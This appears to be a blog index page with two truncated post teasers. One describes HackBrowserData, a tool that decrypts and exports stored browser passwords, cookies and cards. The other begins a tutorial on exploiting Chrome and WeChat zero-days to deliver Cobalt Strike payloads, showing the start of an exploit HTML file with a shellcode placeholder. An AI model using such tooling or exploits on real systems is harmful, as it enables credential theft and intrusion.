Fading Coder

One Final Commit for the Last Sprint

Extracting Browser Credentials with HackBrowserData

HackBrowserData is a command-line utility designed to decrypt and export browser-stored data—including passwords, cookies, history, bookmarks, credit cards, downloads, local storage, and extensions. It supports the most popular browsers across Windows, macOS, and Linux. Disclaimer: This tool is inte...

Exploiting Chrome and WeChat Zero-Day Vulnerabilities for Cobalt Strike Payload Delivery

Exploiting Chrome for Cobalt Strike Payload Delivery Create the Exploit HTML File Save the following JavaScript payload as chrome_exploit.html. <script> function triggerGarbageCollection() { for (let i = 0; i < 0x80000; ++i) { new ArrayBuffer(); } } const payload = []; // Insert shellcode h...